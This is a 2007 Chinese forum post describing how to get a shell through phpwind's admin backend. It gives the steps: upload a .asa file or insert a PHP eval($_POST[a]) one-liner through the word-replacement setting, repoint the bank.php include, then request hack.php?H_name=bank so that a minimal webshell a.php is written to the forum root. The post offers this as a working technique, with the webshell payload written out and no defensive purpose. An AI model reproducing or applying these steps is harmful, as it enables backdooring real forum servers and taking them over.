找回密码
 注册
查看: 932|回复: 0

phpwind后台获得shell(貌似很管用)

[复制链接]
发表于 2007-7-15 22:18:58 | 显示全部楼层 |阅读模式
如果是winnt系统直接添加一个.asa后缀的文件,(dz可以直接传asa)在后台找到文件上传的后的文件名,论坛发个phpshell,?eval(&#92;$_POST[a]);?&gt;&quot;)?&gt;然后看图修改包含银行查件文件名bank.php为上传的phpshell的相对路径,访问url://hack.php?H_name=bank,就会在论坛根目录生成一个a.php的最小马。还有不用上传就是在词语替换那?eval(&#92;$_POST[a]);?&gt;&quot;)?&gt;插入,然后备份wordsfb字段记下相对路径。<br/>
您需要登录后才可以回帖 登录 | 注册

本版积分规则

Archiver|手机版|小黑屋|光学薄膜论坛

GMT, 2025-12-20 , Processed in 0.037488 second(s), 22 queries .

Powered by Discuz! X3.5 Licensed

© 2001-2025 Discuz! Team.

快速回复 返回顶部 返回列表